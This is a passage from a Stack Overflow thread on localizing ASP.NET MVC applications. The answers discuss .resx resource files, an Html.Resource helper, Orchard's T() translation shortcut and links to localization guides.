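    // Local resources belong to a view, so a controller has to use global resources
    string message = (string)HttpContext.GetGlobalResourceObject("Site", "WelcomeMessage");
    ViewData["Message"] = message;
    return View();
}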
A: Yes resources are still the best way to support multiple languages in the .NET environment. Because they are easy to reference and even easier to add new languages.
Site.resx
Site.en.resx
Site.en-US.resx
Site.fr.resx
etc...
So you are right still use the resource files.
A: I found this resource to be very helpful
Its a wrapper round the HttpContext.Current.GetGlobalResourceString and HttpContext.Current.GetLocalResourceString that allows you to call the resources like this...
// default global resource
Html.Resource("GlobalResource, ResourceName")
// global resource with optional arguments for formatting
Html.Resource("GlobalResource, ResourceName", "foo", "bar")
// default local resource
Html.Resource("ResourceName")
// local resource with optional arguments for formatting
Html.Resource("ResourceName", "foo", "bar")
The only problem I found is that controllers don't have access to local resource strings.
A: The Orchard project uses a shortcut method called "T" to do all in-page string translations. So you'll see tags with a @T("A String to Translate").
I intend to look at how this is implemented behind the scenes and potentially use it in future projects. The short name keeps the code cleaner since it will be used a lot.
What I like about this approach is that the original string (English, in this case) is still easily visible in the code, and doesn't require a lookup in a resource tool or some other location to decode what the actual string should be here.
See http://orchardproject.net for more info.
A: Some of the other solutions mentioned in the answers here do not work for the released version of MVC (they worked with previous alpha/beta versions).
Here is a good article describing a way to implement localization that will be strongly-typed and will not break the unit testing of controllers and views: localization guide for MVC v1
A: This is another option, and you'll have access to the CurrentUICulture in the controller:
Check MVC3-multi-language
| {
"language": "en",
"url": "https://stackoverflow.com/questions/4034",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "70"
} |